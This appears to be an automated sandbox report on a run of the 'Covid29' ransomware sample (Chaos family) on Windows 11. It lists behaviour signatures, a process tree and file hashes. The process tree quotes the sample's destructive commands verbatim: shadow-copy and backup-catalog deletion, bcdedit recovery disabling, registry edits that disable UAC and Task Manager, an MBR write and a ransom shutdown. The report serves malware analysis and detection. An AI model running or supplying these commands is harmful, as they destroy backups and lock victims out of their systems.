Analysis

  • max time kernel
    268s
  • max time network
    245s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-01-2025 22:32

General

  • Target

    https://github.com/pankoza2-pl/malwaredatabase-old

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2776
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff997e23cb8,0x7ff997e23cc8,0x7ff997e23cd8
      2⤵
        PID:3924
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
        2⤵
          PID:2328
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4064
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
          2⤵
            PID:2724
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
            2⤵
              PID:3376
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
              2⤵
                PID:1376
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
                2⤵
                  PID:4204
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
                  2⤵
                    PID:4176
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                    2⤵
                      PID:5032
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
                      2⤵
                        PID:1492
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4004 /prefetch:8
                        2⤵
                          PID:4908
                        • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3760
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2036
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                          2⤵
                            PID:4980
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4656 /prefetch:2
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2092
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
                            2⤵
                              PID:4936
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:8
                              2⤵
                              • NTFS ADS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3932
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
                              2⤵
                                PID:832
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 /prefetch:8
                                2⤵
                                • NTFS ADS
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2744
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17138556586706637545,15523962927497197320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
                                2⤵
                                  PID:2680
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4496
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:4260
                                  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                    1⤵
                                    • Modifies registry class
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1888
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:236
                                    • C:\Windows\system32\NOTEPAD.EXE
                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware (1).zip\readme.txt
                                      1⤵
                                        PID:3104
                                      • C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe
                                        "C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe"
                                        1⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5116
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\TrojanRansomCovid29.bat" "
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry class
                                          PID:3932
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\fakeerror.vbs"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3464
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping localhost -n 2
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • System Network Configuration Discovery: Internet Connection Discovery
                                            • Runs ping.exe
                                            PID:2108
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:3356
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:1608
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:4528
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:2620
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:3728
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                            3⤵
                                            • UAC bypass
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:5012
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                            3⤵
                                            • UAC bypass
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:4888
                                          • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\mbr.exe
                                            mbr.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Writes to the Master Boot Record (MBR)
                                            • System Location Discovery: System Language Discovery
                                            PID:1420
                                          • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\Cov29Cry.exe
                                            Cov29Cry.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1304
                                            • C:\Users\Admin\AppData\Roaming\svchost.exe
                                              "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                              4⤵
                                              • Drops startup file
                                              • Executes dropped EXE
                                              • Drops desktop.ini file(s)
                                              • Sets desktop wallpaper using registry
                                              • Modifies registry class
                                              • Suspicious behavior: AddClipboardFormatListener
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4164
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                5⤵
                                                  PID:1996
                                                  • C:\Windows\system32\vssadmin.exe
                                                    vssadmin delete shadows /all /quiet
                                                    6⤵
                                                    • Interacts with shadow copies
                                                    PID:2452
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic shadowcopy delete
                                                    6⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1984
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                  5⤵
                                                    PID:2104
                                                    • C:\Windows\system32\bcdedit.exe
                                                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                      6⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1104
                                                    • C:\Windows\system32\bcdedit.exe
                                                      bcdedit /set {default} recoveryenabled no
                                                      6⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:2872
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                    5⤵
                                                      PID:2504
                                                      • C:\Windows\system32\wbadmin.exe
                                                        wbadmin delete catalog -quiet
                                                        6⤵
                                                        • Deletes backup catalog
                                                        PID:4656
                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                      5⤵
                                                        PID:1924
                                                  • C:\Windows\SysWOW64\shutdown.exe
                                                    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2944
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping localhost -n 9
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                    • Runs ping.exe
                                                    PID:996
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im explorer.exe
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4520
                                                  • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\Cov29LockScreen.exe
                                                    Cov29LockScreen.exe
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:2432
                                              • C:\Windows\System32\PickerHost.exe
                                                C:\Windows\System32\PickerHost.exe -Embedding
                                                1⤵
                                                • Suspicious use of SetWindowsHookEx
                                                PID:1292
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1880
                                              • C:\Windows\system32\wbengine.exe
                                                "C:\Windows\system32\wbengine.exe"
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:444
                                              • C:\Windows\System32\vdsldr.exe
                                                C:\Windows\System32\vdsldr.exe -Embedding
                                                1⤵
                                                  PID:3572
                                                • C:\Windows\System32\vds.exe
                                                  C:\Windows\System32\vds.exe
                                                  1⤵
                                                  • Checks SCSI registry key(s)
                                                  PID:1740

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  e9a2c784e6d797d91d4b8612e14d51bd

                                                  SHA1

                                                  25e2b07c396ee82e4404af09424f747fc05f04c2

                                                  SHA256

                                                  18ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6

                                                  SHA512

                                                  fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  1fc959921446fa3ab5813f75ca4d0235

                                                  SHA1

                                                  0aeef3ba7ba2aa1f725fca09432d384b06995e2a

                                                  SHA256

                                                  1b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c

                                                  SHA512

                                                  899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  03fd5cb425bf58d6f9526e9b8f18342f

                                                  SHA1

                                                  984229ef7332484eeff9de85951297714ec47736

                                                  SHA256

                                                  98a0838c9bcb4923ad198c32bd53fe08da802bdaf0ee591570e672c3748d14b9

                                                  SHA512

                                                  eba0de4d965eaa93e885f15eaffa67dc7410def60b452a9605a9edc187034b34bc4344f24d4115f3b7ebf14f5b080bde03baaa8fdb578e55d88c232a8b9cf058

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                  Filesize

                                                  579B

                                                  MD5

                                                  be85a012866f82533b134a3e7c03581c

                                                  SHA1

                                                  8f361377763dc0f643a3c2746149ca5850c5d8c0

                                                  SHA256

                                                  7c0534066657219aeecf9763515dbb8eeb5b0cc4509d25ed75d5347476f443a0

                                                  SHA512

                                                  38aa3dc3c36a5319162d52fb0bdb7588dfa9fada5247c49ee53d870b7d928ea5be1387e176e8caf3dd6cad9b6975d432eae587c0103f8dffc56f17ef887ae621

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                  Filesize

                                                  496B

                                                  MD5

                                                  d22266ba3d8db30279b96944f0cec985

                                                  SHA1

                                                  44e288cdfe75a5e8299ce32e75dd9e0705cdbac9

                                                  SHA256

                                                  77873629fa695e434160c86ae9116906ff65a97666d7d35a3ed63221b627c0bf

                                                  SHA512

                                                  d463aecbdac835dace5544b4267c86c2ed7d3165ba95095db6dfc3a25655f2391fa202a81d37b4a76a36f04456ed86df137302ad0e456fd59ecdfee3c69c6c1b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  d2aebbfdd9295d720a1025b3b25f740f

                                                  SHA1

                                                  ea81fbc33b0065707cd6cb775f0ecfd349f6634f

                                                  SHA256

                                                  fd8e16142226117804491ce17b1269acf82da16be597b004a46f6275def916b6

                                                  SHA512

                                                  35c876fba6276602966805fefa6e1ea4dcce250a7d47b98391d14d4fd2416b33b80c31e7590e57cf9149dd78fb71d407d57afc1450d65dfd7a30687482d5ef1f

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  027092be8ab7c7f94c707eed48fd6772

                                                  SHA1

                                                  aca8eea66a4689343cbba28a2d31462bd93d0c05

                                                  SHA256

                                                  e028f41bb2797b4a565a717a8bb59a9c1599f100462d6d4f46eccf7a47650883

                                                  SHA512

                                                  0885f376274ecd14d792a3535f0a0c13947f4b70c5e742dc050c2ef69c10dcf6eed0a38e71e9781c14136fb427d13d9968072078311b8bc670e8c5870e5ddeda

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  37eb1231361cbcb2636de5366006de4f

                                                  SHA1

                                                  6162927c4350f61abcc9c6138b0ab10fb930843d

                                                  SHA256

                                                  14eb5de42f91e83aa24fd5f5ef8e0b304c64898c723801908c26110194eedc63

                                                  SHA512

                                                  f599a7eb89fc36dc1a4f5b0b1120c25fec40280930719c023cad7315d472f5c674badfa3aa9d3a7399e61ec3e8bfd63ab055bf7403adecf5d857efad7b41c185

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  76e6c1d722809e977f38dd893e395b31

                                                  SHA1

                                                  3853dffae763ff88378dc6411cf99d22141a2234

                                                  SHA256

                                                  f72ecc51ee2179fe9c6f93d4dcf0f220fbe62872e4456e530d52330942e17e0e

                                                  SHA512

                                                  79ee72b65bd84d2fd578c7c48d0955e2a34904188c6ca9fb7858a15f3219f681c8972b8c8cd71e2e24779ee75e22d7031320fa6f1764eafed39af1bf3e3db8b3

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                  Filesize

                                                  874B

                                                  MD5

                                                  8c015061eca20652a78c995c517339c4

                                                  SHA1

                                                  18d3db455009d1e25ec2ac4bffa8dd9bb6899544

                                                  SHA256

                                                  9d985075e0c4ae661ba26d0d592a126ff86de16278b5af42a24988c663e173ed

                                                  SHA512

                                                  39fa70c62af058d1e103db19bdcb82509acc0b10d3aa4dcc5e2e2470f3db2c50dab42ea432cdbb1bb52325d338329e8de4f9bb3ad460fc70c25a7952a6e68b60

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57dff0.TMP

                                                  Filesize

                                                  874B

                                                  MD5

                                                  75affedfbb501b686a1ba08521184080

                                                  SHA1

                                                  b4e8018183cdc2c534e270822da12a862ed2e90e

                                                  SHA256

                                                  a596018e8bae4b37865e778119afa85a830234a627a7ba2817474c9645c19c40

                                                  SHA512

                                                  9d07e403c08e22be5b575a561568d24b5b665079f350660c1bb069fd79eafe1600688cabebd049a38ba1ef772edf722598ecc4dad63bd9c482bef69c74b38495

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                  Filesize

                                                  16B

                                                  MD5

                                                  6752a1d65b201c13b62ea44016eb221f

                                                  SHA1

                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                  SHA256

                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                  SHA512

                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f9eab255-8359-47c3-8c21-975322e76d22.tmp

                                                  Filesize

                                                  5KB

                                                  MD5

                                                  993b34d557684e37920f98a45f2a8100

                                                  SHA1

                                                  7ab6dbcc0af798329ffbce1c7ffe7b812f7d37b6

                                                  SHA256

                                                  ac52237ba38e63f139878bbe6ab82f6ac3d1fe5bb2c9ffecdf2eb73b1d63cf72

                                                  SHA512

